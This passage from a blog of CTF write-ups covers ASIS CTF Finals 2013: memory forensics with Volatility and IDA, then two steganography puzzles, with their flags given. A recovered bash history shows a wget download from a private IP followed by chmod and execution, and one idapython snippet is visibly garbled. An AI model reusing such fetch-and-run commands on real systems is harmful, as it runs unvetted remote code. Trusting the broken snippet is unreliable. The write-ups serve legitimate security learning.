/tmp/mem.dump | grep BOOT_ BOOT_IMAGE=/vmlinuz-3.5.0-23-generic  Since the profile available on volatilty site is for older kernel we had to make our own (the steps are described here). After that it's time to play ;] First: bash_history it's quite long but this looks important: $ ./vol.py  -f /tmp/mem.dump --profile=LinuxUbuntu12_10-3_5_0-23x64 linux_bash -H 0x6ee4c0
Volatile Systems Volatility Framework 2.3_beta
....
967 bash                 2013-08-26 11:27:53 UTC+0000   uname -a
967 bash                 2013-08-26 11:27:53 UTC+0000   wget 172.16.133.149:8090/asis-ctf -O /tmp/
967 bash                 2013-08-26 11:27:53 UTC+0000   wget 172.16.133.149:8090/asis-ctf
967 bash                 2013-08-26 11:27:53 UTC+0000   ls
967 bash                 2013-08-26 11:27:53 UTC+0000   du -h asis-ctf
967 bash                 2013-08-26 11:27:53 UTC+0000   chmod +x asis-ctf
967 bash                 2013-08-26 11:27:53 UTC+0000   ./asis-ctf
967 bash                 2013-08-26 11:27:53 UTC+0000   sudo poweroff
967 bash                 2013-08-26 11:27:54 UTC+0000   ls
967 bash                 2013-08-26 11:30:37 UTC+0000   ./asis-ctf
967 bash                 2013-08-26 12:00:04 UTC+0000   sudo apt-get install lynx
967 bash                 2013-08-26 12:00:27 UTC+0000   lynx
967 bash                 2013-08-26 12:10:44 UTC+0000   sudo apt-get install elinks
967 bash                 2013-08-26 12:10:57 UTC+0000   elinks
967 bash                 2013-08-26 12:14:58 UTC+0000   clear
967 bash                 2013-08-26 12:15:00 UTC+0000   ls
967 bash                 2013-08-26 12:15:28 UTC+0000   cp asis-ctf flag1
...


So lets take a look at procesess:

vol.py  -f /tmp/mem.dump --profile=LinuxUbuntu12_10-3_5_0-23x64 linux_pstree
Volatile Systems Volatility Framework 2.3_beta
Name                 Pid             Uid
...
..bash               967             1000
...asis-ctf          9425            1000
...nano              15584           1000
.apache2             16346           0
...


And lets dump the asis-ctf process memory and analyze it:

\$ vol.py  -f /tmp/mem.dump --profile=LinuxUbuntu12_10-3_5_0-23x64 linux_dump_map -p 9425 -D foo/
Volatile Systems Volatility Framework 2.3_beta
Task       VM Start           VM End                         Length Path
---------- ------------------ ------------------ ------------------ ----


To do real RE we should reconstruct the binary, but I didn't bother assuming it's a really simple app, and IDA can follow programs headers, excluding sections which are not present dumped image.

The binary was indeed simple, it waits for input, if input was 'flag' it prints the flag.

The flag was put on the stack byte-by-byte:

LOAD:0000000000400683 mov     byte ptr [rbp+var_A0], 66
LOAD:000000000040068A mov     byte ptr [rbp+var_A0+1], 73
LOAD:0000000000400691 mov     byte ptr [rbp+var_A0+2], 85
LOAD:0000000000400698 mov     byte ptr [rbp+var_A0+3], 82
LOAD:000000000040069F mov     byte ptr [rbp+var_A0+4], 76
LOAD:00000000004006A6 mov     byte ptr [rbp+var_A0+5], 65
LOAD:00000000004006B4 mov     byte ptr [rbp+var_A0+7], 78
...


and printed:

400867
LOAD:0000000000400871 movzx   eax, byte ptr [rbp+rax+var_A0]


Since we don't have a runnable binary, we have to do it manually - easiest method, use idapython:

Python>
for i in range(0,38):
print ""
ASIS_cb6bb012a8ea07a426254293de2bc0ef
Python>


Done.

## Sunday, September 1, 2013

### ASIS CTF Finals 2013 - ~Windows (stegano 106)

This is a task from the ASIS CTF Finals 2013, "Stego" (steganography) category, and it was solved by quite a lot of teams. It was another of my favorite tasks in this CTF - it was quite easy, but required a couple of interesting steps to get to the end. This task was solved collaboratively by Gynvael Coldwind and Samlis Coldwind.

We were given an audio/video file called windows.mp4 (mirror), which looked more or less like this (the windows faded in and faded out at different positions):

In addition to the fading in/out there was an audio track with something that sounded like speech but wasn't quite understandable, and quite a lot of metadata. Some of the metadata contained interesting information, e.g.:

• Ingredients File Path: Frames 2.mp4, reversed.mp3
• Pantry Artist: SpokenText.net - Your free online text to audio converter
• Pantry Title: spokentext_e8b691fef65cc404b854b7cb14afce6f62632285
So basically the metadata revealed the mystery of the audio track - reversed spoken text. And by the way, the Pantry Title metadata gives you the exact ID of the SpokenText.net generated audio file, which you could retrieve from SpokenText.net (click - though the link probably doesn't work anymore).

After either reversing the audio track, or downloading the original file, you would hear the synthesised voice saying a long number: 51324984652187698521487459648201.

One thing I didn't mention before was the task description which went like this:

Append what you find to "ASIS_" and send that as flag.

However, sending in ASIS_51324984652187698521487459648201 didn't work, which means that the video track was also important.

The fading in and out windows didn't reveal anything while taking the frames individually, so we decided to change the black background to transparent on each frame, and merge them all together. This resulted in the following image:

Yes, it's a QR code. Adding a white background and playing with the contrast / brightness made it readable for my QR reader in my cell phone, and resulted in the following string: xorwith313.

XORing the 51324984652187698521487459648201 value with 313 (both treated as bignums) gives 51324984652187698521487459648496, and appending ASIS_ at the beginning gives you the flag: ASIS_51324984652187698521487459648496.

### ASIS CTF Finals 2013 - Chessboard (stegano 175)

This is a task from the ASIS CTF Finals 2013, "Stego" (steganography) category, and it was solved by 2 teams including ours. This was one of my favorite tasks on this CTF, since it was unconventional, interesting and didn't involve too much guessing.

We were given the following description:

Find the flag. Flag is in the form of ASIS_X which X is not a MD5 hash.

And the following PNG image:

The PNG file itself (as in: the PNG format) was clean - it did not contain any hidden data and there was no LSB-stegano - basically what you see is what you get, and what you get it an 8x8 matrix. The bitmap had total of 37-color squares: black plus 36 shades of grey, starting from RGB(5,5,5), up to RGB(180,180,180).

The important part here is that the RGBs of the shades of grey were always divisible by 5; so the darkest was RGB(5,5,5), then RGB(10,10,10), then RGB(15,15,15), ... - you get the picture. Dividing the RGB (or actually the average luminosity) by 5 you would get this:

.. 28 .. .. ..  7 .. ..
.. 16 .. .. 22  6 14 30
.. 19 .. .. .. .. .. ..
.. 31 20 34 26 .. .. ..
27 35 17 29 .. 15 33 ..
1 23 21  9  5  2 25 18
36  4 .. 32 13  3 .. 24
.. .. .. .. 10 11  8 12

We can transcribe to coordinates of each square, counting from top-left, in the order pointed to by the above chart (by luminosity):

 1: 0,5
2: 5,5
3: 5,6
4: 1,6
5: 4,5
[...]

There are a couple of things that can be deduced here:

1. There are 64 fields total, so this is probably some 64- or lower based encoding.
2. If this is a 64-based encoding (like base64), then the password will have to have unique base64 characters, since it's not possible to place more than one square on a given coordinate (and no shade was missing).
3. Taking the coordinates and doing a standard idx = x + y * 8 doesn't give you anything meaningful (i.e. converting what you get to base64 alphabet and decoding it doesn't give you anything meaningful).
4. Taking the reversed coordinates (bottom-right instead of top-left) doesn't give you anything meaningful either.

At this point I've changed my approach. In the task description we were given the information that the flag begins with ASIS_ (same as the flags in most of the tasks), so we did have a part of the plaintext. Encoding the ASIS_ string to base64 we get QVNJU18=, so we are sure that the first few chars will be Q, V, N, J, U and 1 (I'm not taking the last char ("8") into account, since it contains two bits of the next character 8-bit character, which in this case are of course zeroes, but could be anything in the full flag).

Translating the given base64 characters into indexes in the base64 alphabet gives you: 16, 21, 13, 9, 20, 53. And now the big question - how to get the value of e.g. 16 using the coordinates of the first square (0,5)?

Well, you can't do that using the top-left coordinates - if you would want to get 16 from the standard formula mentioned above you would have to have coordinates 0,2. But isn't 0,2 the coordinates of the first square in bottom-left coordinates which we haven't yet tried? Well, yes, it is.

Let's test this idea for the second square: bottom-left coordinates are 5,2, which means that the idx is 5 + 2 * 8, so 21, which is exactly the second element in the above number list!

So to get the flag you need to, going from the darkest to the brightest square:

1. Get it's bottom-left coordinate.
2. Calculate the idx using the idx = x + y * 8` formula.
3. Take the idx-th character in the base64 alphabet and append it to the result string.
After that you will get the string QVNJU19GTEFHM2dxaXpiS0RPWkY5b3hLejZI, which, after decoding, will result in the flag: ASIS_FLAG3gqizbKDOZF9oxKz6H.

From what I've read on IRC most of the teams were really really close with this task, but didn't end up testing the bottom-left coordinates. Funnily I did test this coordinate system, but due to a bug in my code I didn't get the code until did the plaintext attack - lucky me ;)